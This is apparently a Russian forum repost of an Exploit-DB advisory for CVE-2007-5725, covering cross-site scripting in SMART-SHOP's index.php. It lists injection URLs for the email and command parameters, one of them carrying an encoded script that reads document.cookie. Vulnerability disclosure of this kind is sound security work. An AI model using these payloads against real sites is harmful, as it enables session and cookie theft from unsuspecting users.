Exploit Smart-Shop - 'index.php' Multiple Cross-Site Scripting Vulnerabilities

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
30716
Проверка EDB
  1. Пройдено
Автор
DOZ
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
cve-2007-5725
Дата публикации
2007-10-29
Код:
source: https://www.securityfocus.com/bid/26232/info

SMART-SHOP is prone to multiple cross-site scripting vulnerabilities because the application fails to sufficiently sanitize user-supplied input.

Exploiting these vulnerabilities may allow an attacker to perform cross-site scripting attacks on unsuspecting users in the context of the affected website. As a result, the attacker may be able to steal cookie-based authentication credentials and to launch other attacks. 

http://www.example.com/index.php?page=&email=<Evil-Script> 
http://www.example.com/index.php?page=home&command=<Evil-Script> 
http://www.example.com/index.php?page=home&component=currencies&command=<Evil-Script> http://www.example.com/index.php?page=home&component=basket&command=%3Cscript%3Ealert(document.cookie);%3C/script%3E
 
Источник
www.exploit-db.com

Похожие темы